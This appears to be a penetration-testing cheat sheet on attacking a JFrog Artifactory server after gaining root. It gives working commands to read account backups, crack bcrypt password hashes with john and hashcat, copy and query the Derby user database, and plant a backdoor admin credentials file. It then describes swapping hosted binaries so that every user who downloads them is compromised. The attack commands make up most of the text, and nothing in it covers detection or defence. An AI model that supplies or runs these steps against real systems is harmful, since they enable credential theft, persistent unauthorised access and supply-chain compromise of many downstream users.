Artifactory

Check status: ps aux | grep artifactory

External access: http://serverip:8081

Sensitive information

with root access to the server, check /{ARTIFACTORY FOLDER}/var/backup/access for artifactory accounts

root@controller:/opt/jfrog/artifactory/var/backup/access# 
cat access.backup.20200730120454.json

Check "password" -

$2a$08$xxxx./yyyy

Crack password

sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

hashcat hash.txt --force --hash-type=3200

Compromise DB

mkdir /tmp/hackeddb
sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/hackeddb
sudo chmod 755 /tmp/hackeddb/derby
sudo rm /tmp/hackeddb/derby/*.lck

Since Artifactory is using Derby as its default database, we'll need Apache's Derby tools to be able to connect to it. More specifically, the ij command line tool, which allows the user to access a Derby database and perform queries against it. The Derby tools are already installed on the controller at /opt/derby, but they can also be downloaded if necessary.

Fortunately for us, the default database does not require a username and password and relies on file permissions to protect it. Because we have root privileges, we can connect without problems. Artifactory contains its own version of Java and we can use it to run the Derby connection utilities and connect to our database.

sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij

ij>
connect 'jdbc:derby:/tmp/hackeddb/derby';
select * from access_users;

Crack the bcrypt hashes as above

Add backdoor user

This method requires write access to the /opt/jfrog/artifactory/var/etc/access folder and the ability to change permissions on the newly-created file, which usually requires root or sudo access.

/opt/jfrog/artifactory/var/etc/access

admin2@*=adminpwd

sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/hack.creds

sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start

sudo grep "Create admin user" /opt/jfrog/artifactory/var/log/console.log

We now have admin access to Artifactory and can modify binaries as we see fit.

In a real-world scenario, if the user was using Artifactory as a repository, running an update on their local system would trigger a download of the updated binary. The next time the binary is run by the user, they would be compromised. The same would occur if Artifactory was being used as a simple file store for shared binary files. Any subsequent downloads of our updated file would result in the user being compromised.

Artifactory is an excellent option for compromising many targets in a single effort and can help to expand access significantly within an internal network.